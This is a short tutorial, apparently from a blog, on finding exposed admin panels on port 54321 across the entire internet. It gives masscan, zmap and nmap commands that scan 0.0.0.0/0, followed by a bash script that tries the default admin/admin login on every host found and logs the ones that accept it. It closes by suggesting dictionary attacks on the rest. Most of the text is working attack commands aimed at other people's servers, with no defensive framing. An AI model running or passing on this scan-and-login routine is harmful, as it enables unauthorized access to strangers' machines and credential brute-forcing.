Preparation#
- Debian or Ubuntu server
Installation Tools#
apt install -y nmap zmap masscan
Rough Scan#
masscan
masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json
zmap
zmap --target-port=54321 --output-file=scan.log
nmap
nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log
Weak Password Login#
In the early years, some one-click installation scripts for certain UIs used the weak password admin/admin, and many people were too lazy to change it. Therefore, you can try to log in one by one for servers with the default open port 54321.
#!/bin/bash
for ip_ad in $(sed -nE 's/.*"ip": "([^"]+)".*/\1/p' scan.json); do
if curl --max-time 1 http://$ip_ad:54321; then
res=$(curl "http://${ip_ad}:54321/login" --data-raw 'username=admin&password=admin' --compressed --insecure)
if [[ "$res" =~ .*true.* ]]; then
echo $ip_ad | tee >> week.log
fi
echo $ip_ad | tee >> all.log
fi
done;
week.log contains all the machines that can be logged in with weak passwords, which is quite easy to scan.
all.log is the machines that have changed their passwords, you can try further dictionary enumeration if interested.